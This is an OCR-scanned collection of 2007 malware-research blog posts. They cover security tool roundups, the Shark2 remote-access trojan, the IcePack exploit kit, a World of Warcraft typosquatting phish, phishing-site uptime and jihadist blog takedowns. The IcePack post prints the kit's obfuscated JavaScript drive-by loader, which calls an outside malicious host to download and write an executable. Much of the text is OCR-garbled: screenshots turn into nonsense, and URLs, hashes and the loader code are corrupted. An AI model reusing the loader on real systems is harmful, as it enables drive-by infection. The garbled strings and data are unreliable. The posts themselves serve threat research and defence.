open source software in the interest of support for other researchers. If you have become a 
victim of the GPCode Ransom trojan, please download a copy and run it on your systems and 
it will decrypt the files back to the state they were in before the trojan infected the computer." 


- [16]Rootkit Detective v1.0 
"McAfee Rootkit Detective is a program designed and developed by McAfee Avert Labs to 
proactively detect and clean rootkits that are running on the system." 


- [17]CSRF Redirector 

"Inspired by the [18]XSS POST Forwarder, | just created the [19]CSRF Redirector. It’s a simple 
tool that makes it easy to test [20]CSRFusing POST, hopefully demonstrating how prevalent 
CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is 
complicated." 


- [21]WordPress Security Scanner 

"The [22]WordPress version surveywas largely successful; it was released on both [23]Slash- 
dotand [24]SecurityFocuswhich | am quite pleased about, but now onto something even more 
interesting - that was just the appetizer. | received alot of questions regarding how my survey 
was conducted. | was going to write an aftermath post (which | still may do), but decided to 
release my tool, "wp-scanner" instead." 


- [25]WAZ v 1.0 - Windows Anti DDoS Tool 

"Through my study and research | found lots of networks that are under the hood of Ddos 
attacks.WAZ is a solution to this. The tool is fully functional and effective in stopping the Ddos 
agents. You can find lots of Ddos agents like Trinoo, WinTrinoo, Shaft, Mstream, Stacheldhart 
Ver 1 & 2, Trinity, Entitee etc. They are considered to be the best agents to launch distributed 
denial of service attacks." 


- [26]The Ultimate Distributed Cracker 
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"The main purpose of UDC is the recovery of the passwords by the given hash-values (NTLM, 
MD5, SQL, SHA1 and 40+ other). The typical user can recover own forgotten passwords, 
for example, Windows NT/XP/2003 authorization passwords. Multithreaded and distributed 
recovery modes are supported. The new method for precalculating Hybrid Attack using 
Rainbow Tables is introduced. Now there’s nothing unbreakable" 


- [27]MITRE Honeyclient Project 

"Honeyclients can proactively detect exploits against client applications without known 
signatures. This framework uses a client-server model with SOAP messaging as the primary 
communication method, and uses the free version of VMware Server as a means of virtualizing 
the client environment." 


- [28]PSA3 - PHP Source Auditor III 
"PHP Source Auditor III (or PSA3) was created in order to quickly find vulnerabilities in PHP 
source code. Written in Perl." 


- [29]Javascript LAN scanner 
"Any information obtained using the scanner will not be logged in any way. All new router 
form submissions are anonymous" 


Services & Misc: 


- [30]10 Free Services to Send Self-Destructing/Auto-Expiring Emails 

"Self Destructing emails delete the original message once it has been read by the recipient. 
While they are not completely fool proof, for example, someone can take a photo of the 
message with the camera, the record on the Internet does not remain. Here are a few self 
destructing email providers that you might find useful for sending emails. Some even provide 
free plug-ins for sending emails through a desktop based email client such as Outlook or 
Thunderbird." 


- [31]Video - Using Darik’s Boot and Nuke (DBAN) to Totally Wipe a Drive 

"Another continuation of my [32]file carving videoand [33]selective file shredding (DOD 
5220.22-M) to thwart forensics toolsvideo, this video shows how to use Darik’s Boot and Nuke 
(DBAN) to totally wipe a drive. DBAN is a great tool to add to your anti-forensics tool box." 


- [34]Videos from the ToorCon Information Security Conference 


- [35]CISSP Certification Verification Site 
"Check (ISC)? credential status for an individual or find credential holders within a company 
or geographic area." 


1 
2. 

3. 

4. 

5. 

6. http://www.windowsnetworking.com/articles_tutorials/Group-Policy-Extensions-Windows-Vista-Windows-Server- 
7 

8. 
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9. http://msdn2.microsoft.com/en-us/library/bb498012.aspx 


10. http://www. wardriving.ch/hpneu/news/wdbot1/index.htm 


11. http://honeynet.org/papers/ff/index.htm 


12. http://www.linchpinlabs.com/resources/atsiv/usage-design. htm 


~ 


13. https://psi.secunia.com 


14. http://hihat.sourceforge.net 


~ 


15. http://www.securescience.com/securescienceblog/ransom-waredecrypted. htm 
16. http://vil.nai.com/vil/averttools.aspx 

17. http://shiflett.org/blog/2007/jul/csrf-redirecto 

18. http://whiteacid.org/misc/xss_post_forwarder . php 

19. http://shiflett.org/csrf.php 

20. http://shiflett.org/articles/cross-site-request-forgeries 
21. http://blogsecurity .net/wordpress/tools/wp-scanner/ 

22. http://blogsecurity.net/wordpress/articles/article-230507/ 
23. http://it.slashdot.org/it/07/05/24/167223. shtml 

24. http://www.securityfocus.com/brief/508 

25. http://www.secniche.org/projects/waz/ 

26. http://the-udc.com/ 

27. http://www.honeyclient.org/trac 

28. http://packetstormsecurity.org/filedesc/PSA3.zip.htm 


29. http://www. businessinfo.co.uk/labs/lan_scan/lan_scan. php 


http: //thinkabdul . com/2007/07/25/ten-free-services-to-send-self-destructing-emails-which-expiredisappea 


natted-drives-for-forensics-and-disaster-recover 


33. http://www.irongeek.com/i.php?page=videos/selective-file-shredding-dod-5220-22-m-with-eraser-and-cclea 


er-to-thwart-forensics-tools 


ttp://video.google.com/videosearch?hl=en&q=toorcon.org 


ttps://www.isc2.org/cgi-bin/cert_verification.cgi 
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3.7.17 Shark2 - RAT or Malware? (2007-07-28 20:57) 


1H rome ard rtm ab convent 
eth ah Saved chee teat ta cs 6 
Park Mode I Reneve Saree) 
Pree Pade 1 (Chow Server 


SF ee erratire EO Ramee Ta Oh Coen heensets miter Bultnote K Tartu & Meno 


Serorme [pan 


SF ee ne pete ate Sat as atewwatice Ftd Aeminry Or Cosmet Newent mien tet mt Ae Vtant 


The latest release (26 July 2007) of the Shark2 RAT (Remote Administration Tool) once again 
demonstrates how thin is in fact the line between RATS and malware. Moreover, the reality 
on how malware is often pitched as a RAT for educational purposes only, whereas it includes 
typical malware-like features such as virtual machine detection and anti virus detection, ones 


not so common for RAT’s such as PC Anywhere for instance. So, it’s not a RAT but malware. 
More on Shark2 : 


"sharK is an advanced remote administration tool written in VB6. With sharK you will be able 
to administrate every PC in the world (using Windows OS) remotely. Here aresome facts: 


* sharK uses RC4 to encrypt the traffic with a random cypher generated every new startup. 
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* sharK is able to resume downloads and uploads when the server disconnects on the next 
connect 


* sharK is completly Plugin based! So you have a very small server and never need to update 
it (except on core changes) 


* Compressed Transfers 
* Thumbnail Previews of Pictures 


* Screen Capture with VNC-Technology (Only the parts of the pic that are changed since the 
last shot will be transfered) 


* Keylogger works with Keyboard hooking 

* You have a real DOS-Shell instead of dos-output like in the most Remote Administration Tools 
* Interactive Process Blacklist 

* Virtual-Machine detection" 

Vendors detecting the latest builder already, despite the logical [1]crypter 


Stefan2 (sNiper109 @ STEFAN) (127.0.0.1) - shark 2.1 Final 


 Mozils Firefox (2.0.0.3) C:\Programene|Mozila Firef... 


2.0.0.3 (de) 
W Messenger Plus! 3 - - “C:\Programme\Messenger... 
No-IP.com DUC (remove only) v2.2.1 Vitawerks &N...  "C:\Programme\No-IPIDUC. .. 
80032 antivirus system - - C:\Programene\Eset\Setup\... 
SS NVIDIA Drivers - - C:\WINDOWS\System32\n... 
¥ Privoxy (remove only) - - “C:\Programme\Privoxy\pri... 
PPsPad editor - Jon Fiala "C:\Programme\PSPad edi... 
P Logitech® Camera-Treiber - - “C:\Programme\Gemeinsam... 
PIP 2005 Uninstall - - “C:\Programme\QIP\ungp.... 
WP RAD Studio - CodeGear "C:\Dokumente und Einstel... 
SP ratDvd 0.78.1444 0.78.1444 ratD¥D C:\Programene|ratDVD\unin... 


WReaPlayer C:\Programene\Gemeinsam... 


W Tor (remove only) - ‘\Programme\Tor\Uninst... 
UseNext - Execute Uninstaller 1\Programene\UseNeXT\un... 
PY Microsoft Visual Studio 6.0 Ent... - :\Programme|Microsoft Vi... 
VideoLAN VLC media player 0.8.6 0.8.6 Copy Selected ‘\Programee\VideoL AN\Y. .. 
WP Microsoft Web Publishing Wizar... - unDI32 ADVPACK.DLL,La... 
P windows Genuine Advantage... 1.5.0530.0 : ae 
windows Genuine Advantage... 1.7.0017.0 Microsoft Corp... 


winamp (remove only) “C:\Programme\Winamp\Un... 
windows Media Format Runtime - "C:\Programme| Windows M... 
WP windows xP Service Pack 2 20040803.231... Microsoft Corp... C:\WINDOWS\$NtService?... 
SP winPcap 4.0 4.0.0.755 CACE Technol... C:\Programene|WinPcap\uni... 


SP winRAR archiver C:\Programme\winRAR\uni... 


[Server accepted hello, ready! [CPU Load: 9% [Memory Load: 60% (411,24 MB/511,33 MB) [Ping: 4ms i 


[2]obfuscations to come: 


AntiVir 7.4.0.50 2007.07.28 TR/Sniffer.VB.C.2 
CAT-QuickHeal 9.00 2007.07.28 Backdoor.VB.bax 
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Fortinet 2.91.0.0 2007.07.28 W32/VB.BAX!tr.bdr 
Ikarus T3.1.1.8 2007.07.28 Backdoor.Win32.VB.bax 
Kaspersky 4.0.2.24 2007.07.28 Backdoor.Win32.VB.bax 


MD5: d5eca6c6al1956cb2f4261dalb8f25ee2 
SHAI1: b603d0d6e3dff0f5f0le86eb82eb80a0e0455445 


. http: //ddanchev. blogspot .com/2007/07/more-malware-crypters-for-sale.htm 


1 
2. http: //ddanchev. blogspot .com/2007/07/more-malware-crypters-for-sale.htm 


3.7.18 The IcePack Malware Kit in Action (2007-07-30 01:06) 


» keePack Platinum - Opera = |e fx) 
Dain Mpsexe Bia Sacra Baawere: Mextpyrente: § Cropsene 

) Cosmatp exmaaxy | ida _ Bal Bheeeeeeaal f sone mpeagaaaas G- 
qe > & & Z [3 wn. adenine. php? 27> cl =) 60 


SCOP UGE es eS 


Cucremitan vn@opmauva 
PHP: 44,7 
MySQL: fle 
Safe Mode: Omen 
IP cepnepa: 


Baw IP: 


O6mece Kon-no tpadyKa: 


[1]The IcePack is a rather average web based malware C S&C kit compared to for instance, 
[2]the Black Sun, [3]the Cyber Bot, [4]Mpack, and mostly to [5]Zunker. Average in terms 
of the lack of unique features offered, which makes me think that it’s a hybrid of publicly 
obtainable stats and exploits rotation modules. 


After providing you with in-depth overviews of [6]the WebAttacker and the [7]Mpack kit large 
scale attacks in previous posts, in this post I’ll showcase the IcePack kit in action. As I’ve already 
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pointed out in a previous post related to the [8]increasing number of malware embedded sites, 
malware authors are diversifying their traffic aggregation approaches, and are either exploiting 
the sites themselves, their ISP’s CPanel, or using push, pull and passive embedding techniques 
to achieve their goal. 


Listening to your infection? Indeed. In the middle of the month, the Brazil’s fan sites of popular 
music bands such 


« kcePack Platinum - Opera = |e fx} 
Dain Mpsexo Baa Saxena Brawete: Vextpynentes Crpsexa 

| Connath exnaany : ae aheaeaeae ' aaae x 1 ° Saaea G- 
“aes Py S&S A hatp:ff. Jadeninferdex. pho ?do!tptisubeerpeet y Ee > & 


Goin Toss O44 Soxnaaxxn BoawetTo: Meecrpyrente: Coposce 
_] Conaate sknaaxy | . ae . see eee . » “1 ib * -see Gr 


“ae7rr G&S betpely padmin index. php?do=ftpSscubsimport Ziz G + 6A 


JorpysKa C KOMNDOTEpA : OGaop... 


Jarpysxaccepsepa: accounts.txt 


Hasare 


as [9]t.A.T.u and [10]Linkinpark got [11]IFRAME-ed, and had their visitors infected with a 
IcePack loader. Let’s assess the URL within the IFRAME appropriately. 


URL : hllp://my-loads.info 

IP : 203.121.71.165 

Response : HTTP/1.1 200 OK 

Date: Mon, 30 Jul 2007 01:02:43 GMT 

Server: Apache/1.3.37 (Unix) mod _ssl/2.8.28 OpenSSL/0.9.8a PHP/5.2.3 mod _perl/1.29 


FrontPage/5.0.2.2510 
X-Powered-By: PHP/5.2.3 


Transfer-Encoding: chunked 


Content-Type: text/html 
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<script 

i paenone<ttdnuaScclat*pdecounet -write(unescape( *%3Cscript%2 Blanguage%3D%22 JavaScript%22%3E: 
Ndow.open%28Z22httpZ3az2FZ2F my-loads .infos2F sp1%2F ani_load . php%22%20%22%22%20%22 lef t%3D2 6! 
%3D2 886%2Cscreenks3D2 800%2Cscr eenY43D2 BOO%2CwidthZ3aD5 6s2Cheight%3D5 6%2Cscrollbars%3D1%20m 
DOS2CtitlebarZ3D %2CtoolbarZ3d Ge2Cst atuss%3sD O422%29%3BZGNZO9 self . Focus%28%29%3B% GAZ O9%3CZ21 
3E%OAZO9%3Cscript%2 Olanguages3D%22UBScript%22%3E% OD% GAZOAS2 OZ20d1_pathZ3dzZ22httpe3sAz2F%2Fi 
- info%2Fexe .php%22% 6D% OA% 6DZGA I F%2 Gnavigator . appName%3D%22Microsoft%26I nternet%2 6Explorer® 
en%GD%GN% OD%GAI F42 GI NStrZ28navigator . plat Forme2C%22Win32%22%29%2 GZIC%IES%2 GH%2 GT hensad%an%! 
42 BCQAJYCLrZOD% GACONnSt%2 BACHDE83 1e%3D2 62 DZ GAD I me2 GhbLFELUJZ BDZ GAConst%2 BI UKUS jkmZ3D3%0D2 01 
u618Raz% 00% GACoNnSt%2 Or BE SDESE%3D2% 6D% GAD mS2 ORSUSDPNS% OD% GAC Onst%2 BCLNPRSBDZ3D 1% ODZGADI NZ: 
05% 6D% GAD im%2 GG0X JdeXT% OD% GADINS2 Og3XLRUD1%GD% GAD i Ms2 GHOBS j MFmsZOD% GADIims2 BazwNt 7R2%6DZGAD: 
9dqbk%GOD% GADi M2 Gu B6K5 J7HZGD% GAZ BDZ GAR andomi ze% GD% GAZ BDZ GAG3XLRUD1Z3DGenNsZ28%29% BDZ GAg3XLI 
SXLRUD1%2 0%26%2 0422 .0x%%22%26%220%22%0D% BAZ OD% BAS et %2 BRSUSDPNsZ3Ddocument .createElement%28: 
%26%22 ject%22%2 6%26%2 06%22%22%29% ODS GARSUSDPNs -setattribute%2 6%221%22%26%22d%22%20%22RSUSDI 
D%GARSUSDPHs .setAttributes2 6%22c1a%22%26%22551%22%26%22d%22%20%2261%22%26%2251d%3Nse22%26%: 
5%22%26%226-65A3-1%22%26%221D B-983A- 8%22%26%22 BC BUF C2%22%26%229E 36%22% OD% BAZ ODZ OAS et%2 Ghbl 
0%3D%2 ORSUSDPNs .CreateOb ject%28%22She%22%26%2211 .A%22%26%22pp1ica%22%26%22ti0n%22%20%22%2: 
GASet%2 GA0C9xzS%2 643042 GhbBS j Mfm.NameSpace%28AtbES3 1e%29%.OD% GASet%2 GAoc9xzs I temZ3DAoc9xzs 
me%28%22S%22%26%22ymbol .422%26%22tt F422%29% DZ BAF SUX2dsZ3DSplitZ28Aoc9xzs I tem.PathZ20%22%! 
-1%201%29% BDZ OAaZWNt7R2%3D%2 OF SUX2dS%28 O%29%2 0%26%2 0%22%50%22%2 0%26%2 OF SUX2d5%281%29%2 O21 
50%22%.6D% GAGSXLRYUD1%3D az wNt7R2%2 6%26%2 Gg3XLRvD1% 60% GAZ ODS GASEtS2 GHDLFELUJ%26%3D0%2 OCreatedl 
%22Micros%22%26%220Ft .XM%22%26%22L HT TP%22%29% GDZGAHT TPSession%3DhbLFEluJ . Open%28%22GE%22%: 
2%2Cd1_path%2C 6%29% 6DZGANDLFE Lud .Send%28%29% 60% GANNS2 GError%2 GResume%2 GNextZOD% OAtZI 9dqbk: 
luJ-responseBody% 60% 6N% 60% GANNS2 GError%2 GResume%2 ONext% ODZGASetS2 BGOXJdex TS3DRSUSDPNs .Crei 
t%28%22%22%26%22D0DB%22%26%22 . St%22%26%22r e am%22%20%22%22%29% D4 ONZODSGA I FS2GErr numbers: 
42 8642 BT henZGD%ZGASet%2 BEHKAjuBSZ3DRSUSDPHs . CreateOb ject%28%22Sc%22%26%22ripting .%422%26%221 
22%26%22temOb j ect%20%22%20%22%22%29% 00% BASet%2 Ou B6KS J7NS3DEHKA jus .CreateTextFile%28q3xLRi 
ATRIFAPOLADAAAL Sei 7SRADI ENRAPARE7Z T9Aahk&P9ZANSAAZADAAAF nr&? AiZAN 1%? ATNAAl Sei 7sX%ANAAATNA.IVI 


Then, we are taken to a not so sophisticated obfuscation pointing us to the vulnerabilities 
exploited and the actual binary. Detection rates for the loader so far : 


AntiVir 2007.07.28 TR/Crypt.U.Gen 

AVG 2007.07.28 Obfustat.AGS 

eSafe 2007.07.29 suspicious Trojan/Worm 

Ikarus 2007.07.29 Trojan-Downloader.IcePack 
McAfee 2007.07.27 New Win32 

Panda 2007.07.29 Generic Malware 

Sophos 2007.07.26 Mal/HckPk-A 

Sunbelt 2007.07.28 Trojan-Downloader.IcePack 
Symantec 2007.07.29 Downloader 
Webwasher-Gateway 2007.07.29 Trojan.Crypt.U.Gen 
File size: 6792 bytes 

MD5: ce3291be2ded8b82fc973e5f5473b1fe 

SHAI: fcf4cab3ade392c611c95e16c913fbc967577222 


More [12]screenshots of the IFRAME at Finjan’s blog and a comment on evasive attacks : "The 
toolkit also uses evasive attack. By blocking specified countries and multiple instances from 
the same IP address, it minimizes exposure to security vendors." Very true. Re-visting it again, 
| no longer get exploited. 
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Ice Pack kit screenshots courtesy of IDT Group member while pitching the kit. 


http://blogs .pandasoftware.com/blogs/pandalabs/archive/2007/07/26/Ice_2800_Pack_2900_-for-the-summer .aspx 
http: //ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 


http: //ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_20.htm 
http: //ddanchev. blogspot .com/2007/06/massive- embedded-web-attack-in-italy.htm 


_hetp:/ blogs. pandasoftuare, con/blogs/pandalabs/archive/2007/05/08/2unker. asp 
| http:/ /adanchey.blogepot .con/2007/05/webat tacker~in-action. heal 

_netp:/ /adanchev. blogspot.con/2007/06/apack-kit~attack-on-video. tal 

_ http: / /adanchey.blogepot .con/2001/07 /aalware-enbedded sites increasing. htall 
. http://www. tatugirls.com.br/ 

10. http://www. Linkinparkbr. com/ 


11. http://www. google. com/interstitial?url=http: //www.linkinparkbr.com/ 


12. http://www.finjan.com/MCRCblog. aspx?EntryId=1601 


ODNAURWNE 


3.7.19 World of Warcraft Domain Scam (2007-07-30 13:04) 


< Prev Next> Back to Inbox 


XX Message is not flagged. [ Flag for Follow Up | 
Date: Wed 25 Jul 2007 08:38:44 AM EDT 


From: Blizzard Europe <support@vwow-europe.com> 
(Add to Address Book | Block Address | Report as Spam } 


To: 
Subject: Account Review 


< Prev Next> Back to Inbox 


[1]World of Warcraft playing species, beware! Can you find the differences? Depending on 
the font type, font size and email client, an euphoric gamer can easily fall victim into this, and 
she will, since the domain is currently redirecting to [2]Blizzard’s real WoW site in Europe. As 
you can see in the attached screenshot, this domain registered a week ago aims to trick you, 
and your email client font preferences, into thinking VV equals W, and that vvovv-europe.com 
is indeed wow-europe.com. 


vvovv-europe.com 

69.147.83.157 

Creation Date........ 2007-07-25 
Expiry Date.......... 2008-07-25 


Some [3]developments on the cybersquatting front : 


"The Coalition Against Domain Name Abuse (CADNA) is announcing the launch of its na- 
tional campaign against Internet fraud. A non-profit organization based in Washington D.C., 
CADNA is leading the way in confronting cybersquatting - the fraudulent abuse of domain 
name registration that threatens the future viability of Internet commerce. Although the 
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Anti-Cybersquatting Consumer Protection Act (ACPA) was introduced in 1999, cybersquatting 
remains an underestimated threat. The number of .com domain names alone has doubled 
since 2003, and the number of cybersquatting disputes being filed with the World Intellectual 
Property Organization (WIPO) is on the rise - up 25 % in 2006 from 2005. According to a 
recent independent report, cybersquatting increased by 248 % in the past year." 


So far, this remains the most creative [4]typosquatting "scam to come" I’ve seen in a 
while. 


http: //en.wikipedia. org/wiki/World_of_Warcraft 


ttp://www.wow-europe.com/en/index.xm 


1. 
2. 
3. http: //complianceandprivacy.com/News-CADNA- campaign. htm 
4. 


http: //en.wikipedia. org/wiki/Typosquatting 


3.7.20 GIMF Switching Blogs (2007-07-31 12:10) 


(GY) WorvPress 


This blog has been archived or 
suspended for a violation of our Terms 
of Service. 


You can create your own free blog on WordPress.com. 


The [1]Global Islamic Media Front like pretty much all other cyber jihadist supporters, and ji- 
hadist media agencies, seem to have fallen in love with Wordpress. Exactly one month since | 
posted [2]a list of terrorism supporting or glorifying blogs, both [3]GIMF’s English and [4]Ger- 
man version blogs were shut down. Strike one for the good guys. But did they really dissapear 
from the cyber jihadist blogosphere? Not at all. The Global Islamic Media Front simply switched 
propaganda to [5]this blog. Among GIMF’s most notable IT releases are the [6]Mujahideen Se- 
crets Encryption Tool, and the [7]quarterly released [8]Technical Mujahid E-zine. 


http: //www.globalsecurity.org/security/profiles/global_islamic_media_front.ht 


1. 

2, http:/ /adanchev. blogspot .con/2007/06/List-of-terroriste-blogs. ta 

3, heep:/ /eint wordpress. con) 

4, kttp://ginf wordpress. conf 

5, heep://albattarmedia, vordpress_coa/ 

6, http: //ddanchev. blogspot .con/2007/04/majehideen-secrets-encryption- tool tal 


7. http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


8. http: //ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two.html 
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3.7.21 Feeding Packed Malware Binaries (2007-07-31 14:11) 


Normal Network 


www.example.com 


ee 


1) Response content 
Host: www.example.com =" 


oo 
L 


client 


Fast-Flux Network 


2) 
. GET redirected 
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& 
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eto EN saidec 


zombie -. 
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PC \ 

be 


1) Response content 
Host: flux.example.com 


a, 
& 


client 


Web Request Comparison 


Remember the avvcc.com domain which | mentioned in a previous example of [1]a fast-flux 
network using the WebAttacker kit two months ago? It’s still up and running this time hosting 
online gaming accounts password stealer, and the binary is packed using five [2]different 
packers in exactly the same fashion like the binary obtained two weeks ago. The domain 
itself is a great example of [3]a fast-flux network, a term coined by the Honeynet Project 
to showcase the growing complexity and evasive techniques introduced by the malicious 
ecosystem, on their road to invisibly control, evaluate and manage their malicious campaigns 
online. 


Packed binary obtained two weeks ago : 


File size: 205917 bytes 

MD5: efllbed4a5f4d61ad771204d1lec6ac25 

SHA1: 6c35869de5ef20b949b3d9f53e111f26f4631569 
packers: PECompact, NsPack 

packers: PECOMPACT, BINARYRES, NSPACK 

packers: ZIP, PecBundle, PECompact 


Packed binary as of today : 


File size: 76800 bytes 
MD5: 17d12aecb7aba82ecc38dd6d2dd3e3b3 
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SHA1: 439947056d1005ec8738ed19e84bbba043556a2f 
packers: PECOMPACT, BINARYRES 
packers: PecBundle, PECompact 


Both binaries have a relatively high detection rate, but that’s not the point. The point is 
[4]the ongoing trend of malware embedded web sites, which in combination with a fast-flux 
network prompts the need for [5]re-evaluating your security policies and preemptive security 
strategy. 


Fast-flux networks graph courtesy of the [6]Honeynet Project & Research Alliance. 


. http: //ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 
. http: //ddanchev. blogspot .com/2007/07/more-malware-crypters-for-sale.htm 
. http://www. honeynet .org/papers/ff/fast-flux.htm 


1 
2 
3 
4. http: //ddanchev. blogspot .com/2007/07/malware-embedded-sites- increasing. htm 
5 
6 


ttp://www.packetstormsecurity.org/papers/general/security-policy.pdf 


ttp://www.honeynet.org/ 


3.7.22 Average Online Time for Phishing Sites (2007-07-31 21:28) 


Ga MAltacks 
Average time online (hours) 
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Some vendors specialize in [1]clustering phishing attacks to better understand the phishing 
ecosystem and reveal all of its nodes. Others too, armed with opportunistic business develop- 
ment strategies are [2]developing a market segment to provide their customers with services 
for [3]timely shutting down a phishing or malicious web site. Symantec recently released 
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informative [4]Javerages on the time a phishing site remains online, confirming the need for a 
such a market segment and prompting the discussion on alternative solutions : 


"Our analysis shows how ISPs in some countries are relatively slower than others to shut 
down attacks. For example, Taiwan’s average shutdown time has been only 19 hours on 
92 attacks, while in Australia the average for 98 attacks has been almost one week for a 
single shutdown. Other countries slow to respond include the USA and India. Countries iden- 
tified as responding quickly include Germany, Netherlands, Japan, Estonia, Poland and Russia." 


Moreover, [5]May’s report from the Anti-Phishing Working Group has an ever better sam- 
ple consisting of 37438 unique phishing sites, where the average time online for a phishing 
site was 3.8 days, and the longest time online was 30 days. Why are certain ISPs slower in 
shutting down phishing sites compared to the others? What motivates the best performing 
ones to react immediately? It’s all a matter of perspective. Let’s consider the facts : 


- DIY phishing kits such as Rock Phish significantly increased the number of phishing 
sites, but sacrificed efficiency for quality. Rock Phish’s major strength is Rock Phish’s major 
weakness, namely that of centralization, so the phisher ends up with [6]a single IP hosting 
phishing sites for numerous banks. In fact, according to [7]IBM’s X-Force, single domains were 
carrying an average of 1000 phishing sites 


- Phishing sites hosted at home users PCs are harder to shut down compared to those 
hosted on a web server 


- Russia is responding faster than the U.S because according to the APWG’s Countries 
hosting phishing sites stats, Russia’s percentage is 7.41 % compared to the U.S 32.41 %. 
We have the same situation with countries hosting trojans and downloaders where Russia 
accounts for 6 % compared to China with 22 %. It does not mean Russia is out of the game, 
not at all, but the way you may have a Russian phishing/malware campaign hosted in the U.S, 
you may also have a U.S phishing/malware campaign hosted in Russia 


- The lack of incentives for ISPs to be in a hurry and the lack of accountability for them 
if they are not in a hurry. Perhaps if the vendors developing the market segment for shutting 
down phishing sites start sharing revenues in a win-win-win fashion, it would make a difference 
if no legislations are in place 


- [8]XSS vulnerabilities within E-banking sites often act as redirectors, so while you’re 
shutting down the yet another .info domain, the XSS is still there waiting to get abused 


- In a [9]fast-flux empowered [10]malicious economies of scale attacks, any stats should 
be considered at least partly "scratching the surface" only due to the fact that, while the 
redirector may be in the U.S, the second one with the phishing site may be in Russia, and the 
third one hosting the malware in Taiwan. And so, while you’ve shut down the most obvious 
nodes, the campaign remains in tact, and gets automatically re-mixed to achieve malicious 
diversity using the same domain names, but under different and dynamic IPs next time 


What would be the most effective approach for the most targeted financial services to 
protect their customers from phishing attacks? Hire brandjacking monitoring services to 
shut down efficiently and persistently, the generated phishing sites with DIY phishing kits, 
educate E-banking customers, or do both? Assess their unique situation and balance while 
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considerating that [11]some folks still don’t know what phishing really is. Now, try explaining 
to them what form input grabbing malware tools such as [12]the Nuclear Grabber are. 


Related posts: 

[13]A Client Application for Secure E-banking? 

[14]The Rock Phish Kit in action 

[15]The Brandjacking Index 

[16]Security threats to consider when doing E-banking 
[17]Banking Trojan Defeating Virtual Keyboards 
[18]Defeating Virtual Keyboards 


pay 


. http: //ddanchev. blogspot .com/2007/01/clustering-phishing-attacks.htm 


ttp://ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 


ttp://ddanchev. blogspot .com/2007/04/taking-down-phishing-sites-business.htm 


. http: //www.symantec.com/enterprise/security_response/weblog/2007/07/online_fraud_in_italy_analysis_1.htm 


. http://www.antiphishing.org/reports/apwg_report_may_2007. pdf 


2 
3 
4 
5 
6. http: //ddanchev. blogspot .com/2006/12/phishing-domains-hosting-multiple.htm 
7 
8 
9 


. http://blogs.iss.net/archive/PhishingIncreases.html 


ttp://ddanchev. blogspot .com/2007/02/xss-vulnerabilities-in-e-banking-sites.htm 


_http:/ /adanchev. blogspot .con/2007/0T /teeding-packed-nalvare-binar ies. heal 
10, fittp://adanchev .bogepot .con/2007/08 /andergz ound econoaye-eupply-of-goods tal 
_netp:/ /adanchev blogspot .con/2006/4/auclear~ grabber toolkit tal 


. http: //ddanchev.blogspot.com/2007/05/client-application-for-secure-e-banking.htm 


14. http: //ddanchev.blogspot.com/2007/07/confirm-your-gullibility.htm 


15. http: //ddanchev. blogspot .com/2007/05/brandjacking- index.htm 

16. http: //ddanchev.blogspot .com/2006/01/security-threats-to-consider-when.htm 
17. http: //ddanchev.blogspot.com/2006/09/banking-trojan-defeating-virtual.htm 
18. http: //ddanchev.blogspot .com/2007/05/defeating-virtual-keyboards.htm 


3.8 August 


3.8.1 GIMF Now Permanently Shut Down (2007-08-03 13:29) 


(GY) WorvPress 


This blog has been archived or 
suspended for a violation of our Terms 


You can create your own free blog on WordPress.com. 
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That was fast, and we could easily start talking about the average time it took to shut down 
[1]cyber jihadist communities like these. On Tuesday after | pointed out that it took a month 
[2]to shut down GIMFs English and German version blogs, and how they’ve switched to a third 
one, [3]it’s now down too, for less than 48 hours. Limiting cyber jihadists opportunities to op- 
erate and develop online communities is directly undermining their supporters’ confidence in 
GIMF’s ability to remain online. And despite that the blogs have been around for quite a while 
taking advantage of an effective one-to-many communication model, they’re now finally down. 
Intact, however, still remain [4]Jihad Fields are Calling! with their eye catching [5]Jihadist Wall- 
papers Gallery, and the [6]Caravan of Martyrs with another [7]Jinadist Gallery worth checking 
out, especially the comments within. 


ttp://caravanofmartyrs.wordpress.com/ 
ttp://caravanofmartyrs.wordpress.com/gallery/ 


1. 
2: 
3. 
4. http://mujahidfisabeelillah.wordpress.com/ 
5. 
6. 
7. 


3.8.2 Delicious Information Warfare, Friday, 3rd (2007-08-03 14:48) 


It’s time for this week’s research papers, tools and services worth going through. Catch up 
with [1]last week’s content, stay informed, and keep in mind that the most prolific threat of 
them all is the lack of a decent situational awareness. 


Papers and Publications : 


[2]Presentations and White Papers from Black Hat 2007 
"The entire collection of presentations and white papers per researcher from this year’s Black 
Hat Con." 


[3]Netcat for the Masses 

"Having had numerous people recently ask me about the various uses for Netcat | decided 
to put together a document showing a few handy uses for good ol’ Netcat. Netcat has been 
described as telnet on steroids or a Swiss army knife, both excellent descriptions for this 
versatile little tool." 


[4]Spam Report May 2007 
967 


"In May, spam accounted for 70 % - 80 % of all email traffic on the Russian Internet. No major 
fluctuations were observed. Spam reached a high of 86 % of all email traffic on May 28th, and 
hit a low of 65.4 % on May 21." 


[5]How To Harden PHP5 With Suhosin On Fedora 7 

"Suhosin is an advanced protection system for PHP installations that was designed to protect 
servers and users from known and unknown flaws in PHP applications and the PHP core. 
Suhosin comes in two independent parts, that can be used separately or in combination. The 
first part is a small patch against the PHP core, that implements a few low-level protections 
against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP 
extension that implements all the other protections." 


[6]Microsoft UK Events Website Hacked 
"A detailed analysis how the website was hacked and how it could have been avoided." 


[7]Implementing Effective Vulnerability Remediation Strategies Within the Web Applica- 
tion Development Lifecycle 

"Once you’ve completed a security assessment as a part of your web application development, 
it’s time to go down the path of remediating all of the security problems you uncovered. At 
this point, your developers, quality assurance testers, auditors, and your security managers 
should all be collaborating closely to incorporate security into the current processes of your 
software development lifecycle in order to eliminate application vulnerabilities." 


[8]Defend Your Code with Top Ten Security Tips Every Developer Must Know 

"There are many ways to get into trouble when it comes to security. You can trust all code 
that runs on your network, give any user access to important files, and never bother to check 
that code on your machine has not changed. You can run without virus protection software, 
not build security into your own code, and give too many privileges to too many accounts. You 
can even use a number of built-in functions carelessly enough to allow break-ins, and you can 
leave server ports open and unmonitored. Obviously, the list continues to grow." 


[9]Security Testing Enterprise Messaging Systems 

